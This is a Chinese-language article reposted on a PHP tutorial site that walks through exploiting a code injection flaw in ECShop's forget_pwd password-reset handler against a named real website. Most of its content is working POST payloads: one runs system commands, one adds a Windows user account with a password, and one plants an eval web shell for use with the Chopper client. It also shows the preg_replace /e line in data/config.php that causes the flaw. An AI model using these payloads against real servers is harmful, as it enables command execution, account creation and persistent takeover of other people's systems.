网站地图    收藏   

主页 > 后端 > 网站安全 >

ecshop远程代码执行漏洞 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] Php code injectionTarget:http://www.cunlide.com/(可能是作者网站)ecshop 版本不祥 貌似09awvs 扫之存在sql注入、php code injection、等等多种漏洞。开始试验各种exp 无果Php code injection 需......

Php code injection
Target:http://www.cunlide.com/(可能是作者网站)
ecshop 版本不祥 貌似09
awvs 扫之存在sql注入、php code injection、等等多种漏洞。
开始试验各种exp 无果
Php code injection 需要post提交这个蛋疼么
system 权限
 act=forget_pwd&action=get_pwd&email=${@print(system('net user'))}&user_name=furybijj
无果

二蛋说去掉system之后改%60

 act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%60)%7D&user_name=furybijj
果断成功

其实这个也可以直接用菜刀 connect.

在配置里写下:

www.2cto.com
 <O>act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj</O>
主要利用代码如下:


 act=forget_pwd&action=get_pwd&email=%24%7b%40print%28%60net%20user%60%29%7d&user_name=furybijj

 act=forget_pwd&action=get_pwd&email=%24%7b%40eval%28%24_POST%5bfuck%5d%29%7d&user_name=furybijj
漏洞的原因是

data/config.php


 define('EC_CHARSET','utf-8');
@preg_replace("/[email]/e",$_POST['email'],"error");#万恶

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论